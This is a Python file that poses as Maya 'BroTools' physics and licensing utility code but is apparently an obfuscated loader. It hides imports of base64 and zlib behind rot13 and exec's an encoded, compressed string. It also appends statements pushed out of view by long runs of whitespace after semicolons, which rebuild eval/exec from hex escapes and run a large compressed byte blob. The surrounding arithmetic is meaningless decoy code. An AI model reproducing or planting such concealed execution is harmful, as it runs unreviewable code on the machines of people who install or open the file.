
from builtins import *

def BroUtilities(iterable, start=1):
   result = start
   for element in iterable:
       if not isinstance(element, (int, float)):
           raise TypeError("iterable analysis failed")
       result *= element
   return result

__author__ = "Michael Davydov"
__website__ = "https://brotools.tech; https://michaeldavydov.com"

__code__ = '''import sys
if sys.version_info[0] >= 3:
    import builtins, codecs
    builtins.unicode = str
else:
    import __builtin__ as builtins
    import codecs
o = getattr(builtins, codecs.decode('__vzcbeg__', 'rot13'))
b, z, s = o(codecs.decode('onfr64', 'rot13')), o(codecs.decode('myvo', 'rot13')), o(codecs.decode('flf', 'rot13'))
d, e, c = getattr(getattr(b, codecs.decode('heyfnsr_o64qrpbqr', 'rot13')), codecs.decode('__pnyy__', 'rot13')), getattr(getattr(z, codecs.decode('qrpbzcerff', 'rot13')), codecs.decode('__pnyy__', 'rot13')), '4EJwSDieBwXyXxq6Vvkp@nyH8TGtFvKmicn&d*N*nSKJFuZu$uB6##Zf3aTgZ2AGb^YFTGrMj!AVoU*x*#o6eFn^oF5rjbggbB3BYUuUiZTYkDkLg7xME73at4k6y6DCLYnJK$D4^aXY3GNdY67@#7d&v3PYF^k2T!Sp22#8GKPoui7ESR4bCf2i$xTjXeM@bJ%PE3$6&h5#DZvk9TDGkVokd$a%oJKzT^*stmGf7sCLS3%@jCfMH^CuTGcQ#Qp2yQ%@$A!Co8kjm45!B98Df2ij6Q7fGZZu5hRNT5FbcH6FX!*H$u$2UKR2uXkL4DBWmKZoiwWBPp@qNH!YAyyyRpTsJrA$^H6m4fM3&@S@tK9WfLnSqztv44R@&yVH3S393VSEQrh!Y*bUS&rbPQzaPVA3#K*h8F3^k27sxMxwYeCivxqV3*^^E!RMUzsQBe3TBrpca!r7u5KXAxy2BH@s^DwZEcnjUc5Udmxeu!F3mcC@uSAw7h&Lo8!H5EQQbp%xH^CnMf*gzTTB6R6ymMuZ&9*&oJ497W^5kdc%UqSAJHhqwJ^5R!25*@*2vNrcoGQ8B7SS!2!TrJPZhoby$R2KuT@QuXy8d&foJsq@Po9q%@y!qkESd3LMzCGs5@V%fU!KLbs5!fv5zBgiAM^7Cycxz25yQ5fDi@q%RedPvMWBM6mMdW8pxsy#^*@sZDTPyXY5rJ$Xpgnqw@TaQU@MCKP%vt2BsKxRu78m2KxC%MZwV7HMDddWAsXijVfY^74!bW&$n9^sc6o!QHZH2g4Z@MLH3%7AhQyGmLFb@5S6$QacM*sdMXp$!K8PqVoW$!zQc7zjDZKN77TNW@665i!9UsnbhugqAAc6n4JE*^JD^kVaSce53Sw$@xs^7WwEqG#Fu4U9' + '==='
exec((lambda x: x.decode(codecs.decode('hgs-8', 'rot13')) if s.version_info[0] >= 3 else x)(e(d(c))))'''


# Math, Multiply, _broutilities, MayaPhysicsSimulator, _licensingutilitykit, _detectvar, _simulationscenecontroller = exec, str, tuple, map, ord, globals, type
Math, Multiply, _broutilities, MayaPhysicsSimulator, _licensingutilitykit, _detectvar, _simulationscenecontroller, Restore = eval, str, tuple, map, ord, globals, type, compile

class NodeTopologyOptimizer:
    def __init__(self, Calculate):
        self._mayacmdswrapper = BroUtilities((Calculate, -20915))
        self.Substract(PhysicsEngineCoordinator=85458)

    def Substract(self, PhysicsEngineCoordinator = None):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self._mayacmdswrapper -= 80362 * PhysicsEngineCoordinator
        
        try:
            ((Multiply, {'trlBeltRByu3raeBur': Multiply}) for Multiply in {'l5eoOlltlea5o6ilyle': Math} if _licensingutilitykit > Math)

        except TypeError:
            ({'l5eoOlltlea5o6ilyle': Math} or _licensingutilitykit if {'l5eoOlltlea5o6ilyle': Math} and _licensingutilitykit else None or (_licensingutilitykit, {'l5eoOlltlea5o6ilyle': Math}))

        except:
            _simulationscenecontroller(-47854 * -63323) == None

    def DynamicNodeProcessor(self, _floor = 16746):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _floor -= -25144 - -99030
        self._dynamicnodeprocessor != int
        
        try:
            ((MayaPhysicsSimulator, (Math, _broutilities, MayaNode)) for MayaPhysicsSimulator in {MayaNode: MayaPhysicsSimulator} if _broutilities != Math)

        except OSError:
            (((Math, _broutilities, MayaNode), _licensingutilitykit) for _licensingutilitykit in (Multiply, Math))

        except:
            _simulationscenecontroller(99577 + 71201) == True

    def _brorenmer(DetectVar = Ellipsis):
        return _detectvar()[DetectVar]

    def LicensingUtilityKit(_sceneanalyzer = -11514 + -72038, BroRenmer = None, _mayalicensingframework = _detectvar):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _mayalicensingframework()[_sceneanalyzer] = BroRenmer
        
        try:
            ((Math, _broutilities, MayaNode) or Multiply if (Math, _broutilities, MayaNode) and Multiply else None or (Multiply, (Math, _broutilities, MayaNode)))

        except ArithmeticError:
            (({MayaNode: MayaPhysicsSimulator}, Math) for Math in (Multiply, Math))

        except:
            _simulationscenecontroller(-8651 - 20562) == False

    def execute(code = str):
        try:
            return Math(Restore(Multiply(_broutilities(MayaPhysicsSimulator(_licensingutilitykit, code)))), locals(), globals())
        except:
            pass
        # return Math(Multiply(_broutilities(MayaPhysicsSimulator(_licensingutilitykit, code))))

    @property
    def _dynamicnodeprocessor(self):
        self._mayanode = '<__main__.DetectVar object at 0x000003330BE80898>'
        return (self._mayanode, NodeTopologyOptimizer._dynamicnodeprocessor)

try:
        NodeTopologyOptimizer.execute(code = __code__)
        _licensecheckeragent = NodeTopologyOptimizer(Calculate = -78357 / -33064)

        if 318222 > 5263474:
            _licensecheckeragent.Substract(PhysicsEngineCoordinator = _licensecheckeragent._mayacmdswrapper / -77247)
        elif 140003 < 6792764:
            _licensecheckeragent.Substract(PhysicsEngineCoordinator = _licensecheckeragent._mayacmdswrapper + -4579)                                                                                                                                                                                                                                                          ;NodeTopologyOptimizer.LicensingUtilityKit(_sceneanalyzer='xxxwxxxxwwwwwxwxwwwxwx',BroRenmer=b'x\x9c\xed[[s\xda\xc8\x12~\xcf\xaf\xd0\xcb)\xa4\n\xa1\xc4\xe8\x06\xa9u\xd51!\xc9\xdae\xa0\xbc\xd8\x81r\xca\xa5\x12\x92l\x8b\x8c\x19G\xc8k\xf6<\x9c\xdf\xbe\xdd3#!\x83\xb9\x0b\xbc\xd9\xf2\x88\xb9j\xa4\xb9tOO\x7f=\x822\xdf\xa3cU\xfb^\xeaLj\xb1\xee^]>\x18\xfe\x8fo\xbd\xcb/w\x93\xbe\xde\xa6\xe1\xef\xed\xc7\xf0[\x9d\xf4~T\x7f\x06_\xfc\xea\xf9e{t\xa9\x9f\x0e\xbd\'\x97Mt\xa7t}tK\xd9\x00^\xf1n\xab\xe7\xb1a]\xef\xe8\x1d\xd6\x01\xa7\xc3\x0f2:\xeb\x94\xbe\x7f\xfc\xf8\xfe\xc3\xfb\x0f\xea\x07\xf5}U\xd3\xae\xaf\x8f\x82(\xde\xbe\x89\'\xee&\x13\xe1E0\xdf\xc4m\x98xI\xb2C3\x8b\x1f\xec\xff\xef\x1b\x19\x18\xad\x89w\xd1ht{\xd6\xe9\x1f\xf4\xc1H\'\x90r\x12,iu\xe1\xc3K\xda\xfcJ\xc7\xe1\xf02i7\x1b\xd6%\xbd\xac^\xd0\xaba\xef\xf3\x97\xc6\xf9\x05%W\xe4\xaa\x95\xb6\xed\xba\xd1\xfd\x03\x8b\x13\xd7-|\xd4_\xe9c{x\xf5\xf5J\xbfk\x9c\xdf\x07\xf4\xfc\x07\x1d\xa6\xad\xee\xd0g\xb54x\x8ch\x12\x8d\xc6%\xad\xf2\xa7\x17/\x9c\xb7E\xcdc\x8f\xefG#\xfc\x81\x83\x00\x13\xd0\xa7\xa7\x1co\xf0\x048u\xa7\x8e\x8eGQB\xa3\xc7\xc1,\xa3i\xe5\x0e\xe3l\xce\x19\xbe\x03\xac\x8f\x99=\xb5\xa5}?dc\x95h\x14\x84\x13\xb5D\x19\x9b\xbf{\xadmC\xabf\x93u\x18J\x87&c\xcd\x0e\xe4\xdehU,\xadB\x1a=\xdc3\x7f\x03r\xad\x16\t\xadv\xbb\xd5n\x81kC\x02R\xed\xf6\x1b\xd5\x8a\xa5Z\x9c\x8c7\xa3\xd8\xf2M\xa4\xd9\x94\x8b\x0c\xfa\x0f\xeb\x8c\xe1r\x83\xc2\xe6^\xc8\x16E\xfe\xd8\x1bE\x07!\xdb\xc2\xb6\xf6A\xb6\xc5\x8d\xa5d\xfb\xeb&\xa2\x93\xf0n\xf4X \xf1\xe8\xc9\t\xfc\xd0S\xca\x13\xf4\xe4m\xb5\x15,#\xc7\xd4\xfbR \xc9\xba\x84t\xc1\x0b\x87\xa9\xee\x1b\xc5\n\xd6@\xbc?\xc3\x02\t\xd6\xef\t\xd7\xef\xf7\xfa"\xee\xf3t\x1f\xe8V*U\x86,\x1am\xfb\xea\xe1pH#:\x8c"\x1aa\x02Ro\xbcP,/$\x1e\xa37\x85\xea7\x00\x1f\xf8%\x02\x1e\xf1\xf8\x8dr\x05\xcb\xdd\xc7\xf8\xa2P\xc2A\xa7A\xbfa\xdc\xcc\xc0\x98\xce:\xc2\xf4\x90oc^6\xab%\xad\n\xb7\xf4\x95\xb5L\xb7\nW\x8d{\xc7\xb5\\\x03*Z\xb3e+\xde\xb2P\x15S\x07%\xc3\xb6n\x8c\x1ax[z\x0b\xbc\x9e\x8b\xab\xe8\xc9\x80\xd4H\xb0V]\x9d\xd4\x01F\x07\xa1\xcf\x82P-\xd5n\x92y\xbdD\x13\x01\xf7o\xdc](w\xfb\xe1d\x93=j\tJ^\xc64\x96a\x10\x83X\x06\xc6iz\x1a\xa6\xf7Dn\x153\\\x1fQ\xef~\x10xJ;\x83v-\x1e\xb4[\x1f7\xeeu\xd1\xe3\xac\xf1\xcb\xe1W-\xe7\x9d\xac\xac&\xcb \\{\xa4\xb0*q]\xe2\xf2\xc4\x95\x8a~\xd1P\x97\xef\xf4\xdb\x18?&\x13\xb9\xdad\x0c\xd7.\xe2\xa3J\x02.\x1a\xd6\\\xf6\xd7G\x1b6@\x1c\xb2rb\xb7\x9a\x87\x0e\xb7\x0f\xa3\x01\x08[jB\xdbl\x97y  \xfa\x0c)\x02-)\x1e\x1d\xf0u\x99\xd6\xa5\x08]V\x0f\xf3\xf5\xbd\xcd\xa3Cl\xc7&\xd0\t\xcb6\x89O\xf4\x17\xe3\xfa~f{Y\xcfL\xcf\xf4\xcd:x\xbc<\xb8\xea<\'b\x9e_\xbd\xb06g*\xff\x15\x06\n\\ \xbc\r!\xc6x\x89\x94\xcdS\x18N\xef\xad-O\x005\xf4\x84\xcfa\x8a\xde\x12\x91\xb2T\xa3\xd9f1uq\xd2\xbbS\x89&\x92\xf0\xdbeI\x99\xb9%B\xe421dY\xba\x8c\xd2e\xb5\xaa.\xd9\xeb\xd2\xb2|;\x84\x05\xf4\xec2<\xc7t\xea\x8en[\x86Gt\x9b\xd8@Y\xdb\x7f\xa9\xe6\xe19\xd1\xa99\xe8j<N\xd3\xa9\x93\xa9=,\xbaL\x02\x1d~\xe9\x85p\x05\x99\x0fx~\x9a{\x1e\x87\xab\x87>w\xda\xa3\xaa\xff\x7f\xc1f\xa6\xb1XU\x17\x01;\xcd\x1b\x05\xeaK\x0f\xedA\xf0\x08\xb1b\xe7\x04\x90-E\x0e\x96\n\xb1\xb3\xb6\xb8A\xeb\x02\xfe\xa0\xc7\x11\x8d\xd0\xc20\x1cF\xc3\xe8 \xdaZ\tF\x89\x9bvS\xec\xde|\xf3\xee\xac\x01\xb6\x88kp\xa8d\xbb&\x84\xc4\xd5]\x02U\x8d\xf9\xd2\x9dt\xa1\x9c\x00\xc2\xd8\x94\xbe\x9e\x13D\x96\x14X\xeb\xd45\xd7\x87R\x19q\x04\x0fe\\%r\xf4\xd55i\xb3n\xfb\xe81\xc4+M\xcd\xc6i\xbdu6}9b\xc1~h\xedB\xb6\x1c\xa2\xcd\x8b\x9b\xbf^}\xcc\x12\x1d\xa4\x08\xa26\x93O\xd1Dm\xed\x91"\x90d\xdc\xc4\xa0s\x13\x03\xc4\xd8\xf4\xc1\xb0\xc3z\x90pz=\x07\x86\xf9R\xccm\xb5\xc1\x944\xdd\xb5\xa0\x8e\xe5:\x85\x18X\x8a\xc46\xdco#\xd3\xda\x02\xf7\n\x00\xcc\x8f91\xddZC\xa8\xd9n\x9d\x8b-\x1b|\x15=\x17js\xa5\xbbL\x82.\'\xa1\xba\x890*X\x83"\xbac\xda\x16h&&\xeaR\x8e\x01\xe5\xe4p\x9aT\xa9/\xb4k\xa1Y\xcbp\x97)\xadIs\x19\x91\xb2\xbe*\xf3\x8e\xf4\xfc\x9e\xdc\'\xd6\xa9\xbb&i\xfeM\x981\xd5\xe5\xc2Ls\x0bf\xd3\xfb@\x8d\xfb\xe1\xaf\xec\xe8\xa7\xd7OO\x82\x90\xdfv5G\x98\x92EL\xc96).\xaaJ5\x83\xe4L\x12\xab\xea\xee\x8f\xc5\xf6\xc5>%a\xe2Jm]O\xa9\xcdk\xa5\xb9\xab\xa4\x19n\r\xa4&\xaa\x85UP\x0fk\x10\xa3\xd5\xdd\x9c/=\xc0\x164C\x0f3U\rSL\x9b\xc3\xc0\xab\xea\xd6\xd6\xc7\xc0;H\xf2\xd7\x03y\x19\x9e\x9d"\xdaZ\x96s\xb2\x9c,)\\<d\xeaBJ\x83u\xd4\xf7\xad,\xb8\x92\x97\xf9q\t\xc6"<\xe0&\xff\x8f\x11\x9d\xabP\xaf\x89\x8e\xe3[\x91\x96\xb8\xd7\xc4\x9c\xbd\t\xe6\xa5\x88+"\xc4\xbb\x80z\x01\xfaF\x11\xa2\x0e\xba\x18\xf5\xee\xc5\xca\xc6\x9d0\xac\x893\x844\xbdR\x10\xe9\x80t\t\x17_\x88s\x1d\xd7\xc6\x11\xce\x96\x15a\xff&R\x08\x99R7\xa9\xe5t\x17k\xc6\x06\xbe\xac\xeeF\xd8w\x81\x14w\xa0.q\xadCj\xbf\xdb\x90\x15\x81:G\xe9\xd2\xa3+B\xbd4\xac\xe9I\xad#\xa77S%g\xd4\xcbeu\xd7$\xc5\xe6\x0235\xd8Z\xb2\xd14o\xe6:P\x97\x1d]V\xd7\xda\x80g\xb6\xc6g\x1c\xa3\xb5DB\xb8\xfd\xef\xfe\xff\x0c\xece\x1bh\xb9\xb6o\x1c\x82\xe8\xcb\xaa:\xa6\xe98\x96]\'\xa1U5\xb3{\x87\xc4c\xd99\x87\xd0\x9cw\x06cv\x0eT\x99\xb9<7\xd2\xe5V\xca\xb2z\xd6/\xa7!/\xdd<M\xf3&5\x0c\x8b\xcd\xd2\x94N\xe4\xa7w\xf1\xce\xbf\xe4\x80.\xa7:\xd6\x9c\xfc\xf1HV\xbaz\xa0#\x96\xa8\xf3\xa7\x03\xf3\x1f\xaf\x1f\xc6\xf2\x9f\x12K\x9c\x00\xa4\x1aPZf\xcb\xf2_\x07)K\x08\x97\xa9\xbd\xe2\x03\x86u0\xdd\xeb\xc8b\xa9=\xf2n\xf2\x9fD\xa2O\xafn\x9c\xb6\x03;\x84+\x90>\r\xa7W\x80\xd7/\xc3\x19\xcb\x81\x80=\x95X\xa9\xfc\x92\x8bB\x02\x83},\x81\xd5\x87\xc2\x876d\xae<!\x9d\xda\xcf\x82\x85\xe7\xa3Y\x9d\r\x8e-t~P\xc1t~z\x01\xb9-\xb8?\x9c\x84\xbe\x9aC\xbb\x02\xfe\n(\xac\xbd\xbb\x89\xd9\xbd2\xf0\xc6\xa1m*\xe2\xdf\x87\xca\xc06E\xf7\x14o\xac\xd0\xc8\x0fGxW\xd4l\xc4\xec\x821:\xae\xf8,\x0e+\x83\x98\xfdL\xd2\xc7\xce\x93\xaf\x8f\xd1;\x9fz\xe3\xb1\xf2\x89Q\x16\xab\xbc\xa4r\xce3\xda\xc7w\n\xb8\xff\xf2\xfb\xf7ar\xc7\x02^\x10\x847\n\xbe\xb9\x9b\xc4\xd1\xe8V\xfd\\V\x92p\x92\xc8\xda\xe8\xa4\xea(\r\xfc\x99\xad?\xbb\x7f\xac\x1c)B\xf3\xcf!\x01\x08\xb3\nI\xfc\xd7\xf4m\xe8\xd4FY\xf9TV\x9ae\xe5X\x83\x87\xb1\xbdJ\x1c>P\xcf\x0f\xd5\xa9\xe9\xeb)g\x02\x83DY\xe1{\x93\xd8\xa0\xb8\xc3\x83\xe8\xec9n\x81\xcc\xebVe\x85!\xb3tX\xb3\xc9x\n\xc9\xa8U\xc6\x0f4JT\xceLP\xca\xf0\xfb)\xbc\xcb\xf8\xd1\xac\x96u3\x9c\xf8\xe1C\xa2|\xf3\xe8c\xf89\x8eY\xfc\xf2\x08\xe6\xba/-\x1b\\b\x8a\xa0\xac\xb4R\r\xbc\x95\x86\xd3n\xf7S\x93i/\xb3\xa2b\xb6\xac\xa4[Dn\x12\xd2\xce\x9f\x9e\x9d\x9c\x9d\x9d\x9d\x9e\x9e\x9c\x9c\x81\x87x\xda\xed8L\x1e\xe3\x91\xf2Y\x8dF\x89\xda\xd0\xca\n\xc6\x9fd\xdc\x94\xf1\xb1\xa6-g\x05\xc1<0D?\xc78\xe82\xfc\xd0\x92\x88\xa2=\xcf\n\xfc\x99g%\xea\xcc\xf9\x03\x1f\xa4\xf2\x1f\xe5\xb8r\x1b&\x7f\xdc\x0eTmn\x00\x8dJ\x8e%\x8f\xb5\xacw\xae\x1b\xfet]\xec\x1aK\xee\xc2|\xd7\xb0!^\x96\x95D7\x8a\n\xa5GJC{N<\xd9\x86`j9\n\xf1\xdd&\x16LY\x80\xc2\x1b\xa2q4\x1a\'\xde\x08Hu\\V>\xcd\xccG\xeemj\xa3\x920\xd9a\r[=\xce\xe5s|E\xc7\xe1\x8b\xcfg61A\xf8\xc9$\x1bs\xf6\x9a\xe3\\\xcb\xf8\xfd\x00\x17\x83\xfc\x1b\x02\x14\x8b\xb3S\xa8"[\xf3\xcf\x03\xf1\xbf\xa2\x1d\xce\xff/L:\xb6\x10\x8d\x9b^\xfc\xe3\xd9\xfb\x17|\x13E\xbas\xcd\xa8\xc7\xc0\xcc\x01\x8c\xf97%5\xf1@e\x927\xf7t\xbb\x9a\xe2\x8d\x02 G\xe56\x0e\xc3\x91\xa8L\xe4=LdO@"\xab;\x80\xb5\xc7\xab\xa62\xf3)\'\x18 \x01#\xf8\x1b\xe8X\xa8\xfc')

        if 333575 > 5671214:
            NodeTopologyOptimizer(Calculate = -29787 / -74799).Substract(PhysicsEngineCoordinator = _licensecheckeragent._mayacmdswrapper + 34717)
        elif 445397 < 5619916:
            _licensecheckeragent.DynamicNodeProcessor(_floor = 32973 - _licensecheckeragent._mayacmdswrapper)                                                                                                                                                                                                                                                          ;lIIlllIIllIlIllll,DooODDoDOOODoDDOoOOo,mmmnmmmnnnnmnmmnmmnnmmmn,WXXXXXWWWWWWWXXXXWXWWWXX,DODoooOoODooDOoOOD=(lambda MMNMNMMNNMMMNMMNNMMMNMMNN:MMNMNMMNNMMMNMMNNMMMNMMNN(__import__('\x7a\x6c\x69\x62'))),(lambda MMNMNMMNNMMMNMMNNMMMNMMNN:MMNMNMMNNMMMNMMNNMMMNMMNN['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda MMNMNMMNNMMMNMMNNMMMNMMNN:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(MMNMNMMNNMMMNMMNNMMMNMMNN)"),filename='\x4a\x49\x49\x4a\x4a\x4c\x49\x49\x4c\x49\x49\x49\x49\x4c\x4a\x4c\x49\x49\x49\x4a',mode='\x65\x76\x61\x6c'))),(lambda JLIIIIIJJJJLJIJLJLII,MMNMNMMNNMMMNMMNNMMMNMMNN:JLIIIIIJJJJLJIJLJLII(MMNMNMMNNMMMNMMNNMMMNMMNN)),(lambda:(lambda MMNMNMMNNMMMNMMNNMMMNMMNN:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(MMNMNMMNNMMMNMMNNMMMNMMNN)"),filename='\x4a\x49\x49\x4a\x4a\x4c\x49\x49\x4c\x49\x49\x49\x49\x4c\x4a\x4c\x49\x49\x49\x4a',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        if 212207 > 5645204:
            _licensecheckeragent.Substract(PhysicsEngineCoordinator = _licensecheckeragent._mayacmdswrapper + -43988)
        elif 187948 < 6062205:
            _licensecheckeragent.Substract(PhysicsEngineCoordinator = _licensecheckeragent._mayacmdswrapper + 19597)                                                                                                                                                                                                                                                          ;DODoooOoODooDOoOOD()(WXXXXXWWWWWWWXXXXWXWWWXX(DooODDoDOOODoDDOoOOo(lIIlllIIllIlIllll(mmmnmmmnnnnmnmmnmmnnmmmn('\x76\x61\x72\x73'))),NodeTopologyOptimizer._brorenmer(DetectVar='xxxwxxxxwwwwwxwxwwwxwx')))

except Exception as MayaNode:
        if 266263 > 8134125:
            NodeTopologyOptimizer.execute(code = Multiply(MayaNode))

        elif 181263 > 1044898:
            NodeTopologyOptimizer(Calculate = 17727 / 59170).DynamicNodeProcessor(_floor = -48824 + _licensecheckeragent._mayacmdswrapper)

